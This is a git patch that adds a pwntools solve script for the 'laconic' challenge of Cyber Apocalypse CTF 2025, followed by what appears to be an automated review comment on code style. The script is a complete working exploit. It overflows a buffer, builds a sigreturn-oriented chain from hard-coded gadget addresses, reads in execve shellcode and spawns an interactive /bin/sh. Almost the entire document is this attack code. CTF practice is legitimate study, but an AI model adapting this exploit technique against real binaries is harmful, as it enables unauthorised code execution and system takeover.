From 2bb59fb08f8531b8fd40019afae93f773c879a71 Mon Sep 17 00:00:00 2001
From: jc
Date: Thu, 27 Mar 2025 23:56:51 +0300
Subject: [PATCH] solve script
---
 .../laconic/a.py | 42 +++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py
diff --git a/cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py b/cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py
new file mode 100644
index 0000000..ec2ae34
--- /dev/null
+++ b/cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py
@@ -0,0 +1,42 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./laconic", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.send(a)
+
+# gadgets
+pop_rax = 0x43018
+syscall = 0x43015
+
+# sigframe
+frame = SigreturnFrame()
+frame.rax = 0
+frame.rdi = 0
+frame.rsi = 0x43005
+frame.rdx = 0xff
+frame.rip = syscall
+
+# buf
+buf = b"A"*8
+buf += p64(pop_rax)
+buf += p64(0xf)
+buf += p64(syscall)
+buf += bytes(frame)
+
+# shellcode
+sc = """
+lea rdi, [rsi+32]
+xor rsi, rsi
+xor rdx, rdx
+mov al, 59
+syscall
+"""
+sc = asm(sc) + b"/bin/sh\0"
+buf += sc
+s(buf)
+
+r.interactive()
\ No newline at end of file
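Review bot: The `target` name bound in `context.binary = target = ELF("./laconic", checksec=False)` is never read anywhere in the file, and `s = lambda a: r.send(a)` is the lambda-assignment form PEP 8 advises against; `context.binary = ELF("./laconic", checksec=False)` and `s = r.send` say the same thing. The offsets `pop_rax = 0x43018`, `syscall = 0x43015`, `frame.rsi = 0x43005` and the `0xff` length are bare constants tied to one build of the binary, so a header comment recording which build they were taken from (and that they must be re-derived if it changes) would keep the script from silently breaking later. The constant `0xf` pushed after `pop_rax` would read better as a named value with a one-line comment, matching the `# gadgets` / `# sigframe` section style already used. The file also lacks a trailing newline after `r.interactive()`.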